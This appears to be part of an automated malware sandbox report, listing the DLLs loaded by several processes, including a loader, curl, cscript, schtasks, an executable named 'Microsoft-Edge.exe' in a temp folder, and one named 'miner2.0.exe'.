Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\System32\cscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\cscript.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\cscript.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\cscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\cscript.exe	Section loaded: vbscript.dll	Jump to behavior
Source: C:\Windows\System32\cscript.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\cscript.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\cscript.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\cscript.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\cscript.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\cscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\cscript.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\cscript.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\cscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\cscript.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\cscript.exe	Section loaded: scrobj.dll	Jump to behavior
Source: C:\Windows\System32\cscript.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\cscript.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\System32\cscript.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\cscript.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\cscript.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\System32\cscript.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\cscript.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\cscript.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\cscript.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\cscript.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\System32\cscript.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\cscript.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\cscript.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\System32\cscript.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\cscript.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\cscript.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\cscript.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\cscript.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Section loaded: webio.dll
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Section loaded: pcacli.dll
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Section loaded: sfc_os.dll
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\cmd.exe	Section loaded: apphelp.dll
Source: C:\Windows\System32\curl.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\curl.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\curl.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\curl.exe	Section loaded: mswsock.dll
Source: C:\Windows\System32\curl.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\curl.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\curl.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\System32\curl.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\curl.exe	Section loaded: schannel.dll
Source: C:\Windows\System32\curl.exe	Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\curl.exe	Section loaded: ntasn1.dll
Source: C:\Windows\System32\curl.exe	Section loaded: ncrypt.dll
Source: C:\Windows\System32\curl.exe	Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\miner2.0.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\miner2.0.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\miner2.0.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\miner2.0.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\miner2.0.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\miner2.0.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\miner2.0.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\miner2.0.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\miner2.0.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\miner2.0.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\miner2.0.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\miner2.0.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\miner2.0.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\miner2.0.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\miner2.0.exe	Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\miner2.0.exe	Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\miner2.0.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\miner2.0.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\miner2.0.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\miner2.0.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\miner2.0.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\miner2.0.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\miner2.0.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\miner2.0.exe	Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\miner2.0.exe	Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\miner2.0.exe	Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\miner2.0.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\miner2.0.exe	Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\miner2.0.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\miner2.0.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
